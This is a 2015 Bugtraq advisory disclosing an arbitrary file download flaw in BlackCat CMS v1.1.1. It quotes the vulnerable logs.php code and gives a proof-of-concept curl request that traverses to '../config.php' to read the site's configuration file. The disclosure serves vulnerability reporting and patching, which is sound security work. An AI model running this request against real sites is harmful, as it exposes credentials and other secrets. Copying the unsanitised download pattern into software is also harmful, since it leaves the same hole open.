[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability
- From: d4rkr0id@xxxxxxxxx
- Date: Tue, 16 Jun 2015 12:07:01 GMT
# Exploit Title: BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability
# Date: 2015/06/16
# Vendor Homepage: http://blackcat-cms.org/
# Software Link:
http://blackcat-cms.org/temp/packetyzer/blackcatcms_2fo3PXdKj1.zip
# Version: v1.1.1
# Tested on: Centos 6.5,PHP 5.4.41
# Category: webapps
* Description
file:/modules/blackcat/widgets/logs.php
72 // download
73 if(CAT_Helper_Validate::sanitizeGet('dl'))
74 {
75 $file =
CAT_Helper_Directory::sanitizePath(CAT_PATH.'/temp/'.CAT_Helper_Validate::sanitizeGet('dl'));
<-- Not Taint Checking
76 if(file_exists($file))
77 {
78 $zip =
CAT_Helper_Zip::getInstance(pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip');
79 $zip->config('removePath',pathinfo($file,PATHINFO_DIRNAME))
80 ->create(array($file));
81 if(!$zip->errorCode() == 0)
82 {
83 echo
CAT_Helper_Validate::getInstance()->lang()->translate("Unable to pack the file")
84 . ": ".str_ireplace( array(
str_replace('\\','/',CAT_PATH),'\\'), array('/abs/path/to','/'), $file );
85 }
86 else
87 {
88 $filename =
pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip';
89 header("Pragma: public"); // required
90 header("Expires: 0");
91 header("Cache-Control: must-revalidate, post-check=0,
pre-check=0");
92 header("Cache-Control: private",false); // required for certain
browsers
93 header("Content-Type: application/zip");
94 header("Content-Disposition: attachment;
filename=\"".basename($filename)."\";" );
95 header("Content-Transfer-Encoding: binary");
96 header("Content-Length: ".filesize($filename));
97 readfile("$filename");
98 exit;
99 }
100 }
POC:
curl -sH 'Accept-encoding: gzip'
"http://10.1.1.1/blackcat/modules/blackcat/widgets/logs.php?dl=../config.php"
|gunzip -